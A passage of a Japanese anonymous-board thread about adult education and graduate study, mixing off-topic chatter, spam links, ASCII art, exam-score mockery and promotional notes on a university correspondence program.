 夢をいだかないが鬱にもならず自殺なども考えない。
 
 自主性がなく、社会に対して不平不満などを持たないが自発的に善行や親切などを行うこともない。
 
 悪人ではないが善人でもなく、これといった主義主張をせず、個性が希薄、性格的特徴に欠ける(超凡人性)
 何がしかの才能やこれといった特技などはなく、努力せず、向上心を持たない。
 
 ●引きこもり性ニーホ
   アパートやワンルームマンション、ウィークリーマンション、ビジネスホテルなど
   で自閉的生活を送るニーホの一種別
 
 ●入院性ニーホ
   精神疾患などをよそおい医療保険を詐用して入院生活を送るニーホの一種別
 
 ●入監性ニーホ
   衣食住をまかなうために故意に犯罪を犯し留置場や刑務所暮らしをするニーホの一種別
 
http://atsites.jp/sate/set/Evangelion/Evangelion.html
http://atsites.jp/sate/set/PacificRim/PacificRim.html

166 :名無し生涯学習:2014/06/04(水) 12:16:59.06 .net
ぬるぽ

167 :名無し生涯学習:2014/07/25(金) 14:28:35.72 .net
★2ch勢いランキングサイトリスト★

◎ +ニュース板
・ 2NN
・ 2chTimes
◎ +ニュース板新着
・ 2NN新着
・ Headline BBY
◎ +ニュース板他
・ Desktop2ch
・ 記者別一覧
◎ 全板
・ 全板縦断勢いランキング
・ スレッドランキング総合ランキング
◎ 全板実況込み
・ 2勢
・ READ2CH
・ i-ikioi

※ 要サイト名検索

168 :名無し生涯学習:2015/01/30(金) 22:40:30.35 .net
あけおめ

169 :名無し生涯学習:2015/02/01(日) 00:20:35.77 .net
社会人で社会学の院にいってみたいのですが

170 :名無し生涯学習:2015/02/01(日) 00:55:40.59 .net
http://togetter.com/li/529896
自民党ポスター

ウソつかない
TPP断固反対
ぶれない自民党

農協改革賛成に回る自民党の一部の議員は、誰か憶えておきましょう
これでは、全く信頼出来ません

171 :名無し生涯学習:2018/02/18(日) 06:58:40.69 ID:3EYWMRYg0.net
とても簡単なネットで稼げる情報とか
暇な人は見てみるといいかもしれません
グーグル検索⇒『金持ちになりたい 鎌野介メソッド』

J3XIK

172 :名無し生涯学習:2018/05/08(火) 21:05:00.53 ID:+SS7Mv05M.net
今年から大学院の社会人コースに通ってるんだが、聞きたいことある?

173 :名無し生涯学習:2018/05/08(火) 22:39:24.31 ID:kB821EZvM.net
社会人コースって学費高いイメージ。
慶應も日大も

174 :名無し生涯学習:2018/10/03(水) 18:28:02.30 ID:8M9ljDkx0.net
確実にどんな人でも可能な確実稼げるガイダンス
参考までに書いておきます
いいことありますよおに『羽山のサユレイザ』とはとは

M2O

175 :名無し生涯学習:2020/04/23(木) 06:41:16 ID:fKdMEHzB0.net
https://headlines.yahoo.co.jp/article?a=20200416-00016730-tamahiyo-life
社会学の専門家に聞く、女性の育休後の二大悩みについて

176 :名無し生涯学習:2020/08/09(日) 08:12:02.76 ID:hc6ROcpN0.net
177

177 :名無し生涯学習:2020/08/28(金) 21:59:16.60 ID:+XUKtmFM0.net
178

178 :名無し生涯学習:2022/05/03(火) 16:45:40.35 ID:VTdsiND+0.net
★★★SNSでみる医学部再受験生の悲惨な末路の1例★★★

ごろう@医学部再受験 @goro0101sai    のケース

金融総合職から医学部再受験のために脱サラ    エリート金融マンが医師への華麗な転職を目指す

【再受験2年目・2018年度センター自己採点】
英語 128リス 20  数1a 55数2b 35  化学 37生物 38 現代文 42古文 40漢文 31   政経倫理 43

総合469/950 点

ごろう@医学部再受験 @goro0101sai 2018年4月20日
ひどすぎてこの時はかなり鬱状態になりました。独学で2年近くやってこのザマです。 今後こうならないようしっかり勉強したいと思います。

ごろう@医学部再受験 @goro0101sai 2018年1月14日
2年目にして父親に身の振り方考えろと言われましたが、逆に初学独学で2年で医学部入れたらとてつもなく頭いい人だと思うんですが。
三年学校や予備校通っても浪人する人が沢山いる界隈なのに…。

⇒ 【【【恥を忍んで10代にまじって予備校(河合塾の大学受験科)に1年間100万円払って通って臨んだ2019年センター試験】】】 ⇒
英語 147 リス 46  数1a 44 数2b 55  化学 40 生物 73  国 155  政経倫理 54

「昨日の英語も時間足りなくて前半はただの塗り絵ですしどうしたんだろう。自分本番に弱いな本当。確実に85%は取れる内容だったのに。」
「また今年もセンターに心折られました。二択で悩んで間違える確率ってテストの時には9割くらいですよね。」

ごろう@医学部再受験 @goro0101sai 1月21日
下がるなんて以ての外です。圧倒的に足りなかったのはスピード感です。目指すだけなら誰でも出来るというのは事実ですが、それでもまだ諦めません。
やりたいことを成し遂げる努力を続けたいと思います。


【結論】
年収、社会保険、昇進、結婚、子育てといった人生のイベントを全て投げ捨て脱サラして残ったのは多大な出費と履歴書に書けない空白の数年間。
金融機関に勤めるエリート社会人も医学部再受験で人生崩壊   医学部再受験とは破滅への第一歩なのである。

179 :名無し生涯学習:2022/05/03(火) 16:54:28.76 ID:VTdsiND+0.net
【◎理三】100% 【医歯】100%
[神戸]95% 【◎京大】93% 【◎阪大】93%
○京府88% 【◎名大】86% 横市80%
阪市78% [◎九大]73% 【◎東北】71%
[◎北大]69% [○金沢]65% [○千葉]64% 名市64% [○岡山]63%
【筑波】59% [広島]57% ○長崎55% ○新潟53% 信州52% 岐阜52% 三重52% 奈良50% 鳥取50%
大分44% 滋賀43% 山口42% 香川41%
福井38% 福島37% 徳島37% 富山36% 和歌山35% 秋田34% ○熊本32% 高知32% 宮崎31%
札幌28% 山形28% 旭川25% 佐賀24% 浜松23% 群馬22% 鹿児島21%
琉球18% 愛媛17% 島根14%
弘前5%

180 :名無し生涯学習:2022/05/08(日) 22:41:43.06 ID:ZAEVYaEH0.net
181

181 :名無し生涯学習:2022/05/25(水) 17:47:07.26 ID:DbiAGJjY0.net
司法試験法第5条第1項では,予備試験は「法科大学院を修了した者と同等の学識及び応用能力並びに法律に関する実務の基礎的素養を有するかどうかを判定することを目的」とする試験とされていますが,現状の予備試験は「東京大学の法学部を修了し旧司法試験に合格した者と同等以上の学識及び応用能力並びに法律に関する実務の基礎的素養を有するかどうかを判定する」試験になってしまっているのです。

182 :名無し生涯学習:2023/01/01(日) 09:08:42.74 ID:6Hn3eDRX0.net
世間で実践した社会学が一番強い

183 :名無し生涯学習:2023/03/14(火) 22:06:51.93 ID:lcRi61Vs0.net
       / /   /  / /'´7/    l / -Lll       ヽ l  ヽ
       / /  /  /  /  / l l   l /  l. l ト、      V.   l
     l /l   /  / / _,/、」│   l/  ヽl l `     ヽ   l
      l/ l  l   l / 〃、フ:、∧  l  ニ=ミl、ヽ     ヽ  l
         l   l    ハ〈/:::::::::ll ヽ l  ´,、/`:、ヽヽ     l l
       l ∧   l ∧ l:、: :d l _〉l  l:: :::::::::〉,l l   、 l l
       ヽ Nゝ、  |l l  `─' ラ´F   l: : ´,、/N、 l   l  リ
        ヽ ヽl`l\`ト、_ ,ノ '  l   ` ‐' ' / ハ. ト   l ll  あのー宇宙人の道具とは何の事をおっしゃっているのでしょう?
               ll  `l,、    。 ヽ、_  _ノ// l N  イlノ l
                l  〃 ` ‐、_      ̄ ィフ'  W l/l l l
            l  l 丶  ヾ >,‐ ´  レ/   ハ   ヽl l
              l  / l_,_ ,〉, ノ  /'   ノミ、l   ll l
    _    ,、    l / /川   /  /´   /´´  ヽ  ヽ l
   (_r‐、- l. ト 、. l / l 川   /‐-y´´  //´       ヽ ヽヽ
 , -、. l l 丶`´ヽヽl /l 川  / // /´/´          l  ヽl
.(_, -‐-`_   /〃、/ l 川 l  〃l / 〃         l   ヽ

184 :名無し生涯学習:2023/08/19(土) 20:56:07.79 ID:VFCI9KwG0.net
慶應義塾大学通信(法・経済・文)
https://www.tsushin.keio.ac.jp/
 
・入試倍率は1.5倍。受験者の6割以上合格 
・受験はネット出願で書類選考のみ(東京に行く必要無し)
・学費は年間僅か20万円(教材費レポート添削費用等込)
・新入生の45%(5割以上)が18歳〜29歳と若年層が増加
・卒業率は47パーセント。611人入学して288人卒業
 
春秋の年2回入学募集
インターネット出願対応で手軽に出願可(2021年8月11日〜)
・入学検定料2万円・健康診断書必要無し
・全キャンパスの慶應図書館利用可(医・薬・SFC・日吉・三田)
・通学生と違って、ほとんど通学しなくて可
・司法試験予備・公認会計士・税理士試験目指す学生多い
・卒業式・卒業証書・卒アルも通学生と一緒。三田会入れる
・3割の学生が関東以外の地域の学生。地方在住で学べる

185 :名無し生涯学習:2023/10/01(日) 03:57:15.01 ID:ZeR2pt5p0.net
これってどうしてそうなるの?

186 :名無し生涯学習:2023/10/07(土) 20:31:05.45 ID:Ubbp3wft0.net
https://www.e-daisyo.com/fuji/
https://www.wakakusa.co.jp/daiko/fuji/
https://www.kurunavi.jp/syako/police/22006.html

187 :名無し生涯学習:2023/10/11(水) 09:16:20.27 ID:LMXVwoEE0.net
コイツが持っているのは、俺の運命の歯列(エンゲージリング)だ!!!

40 KB
新着レスの表示

掲示板に戻る 全部 前100 次100 最新50
名前: E-mail (省略可) :

read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★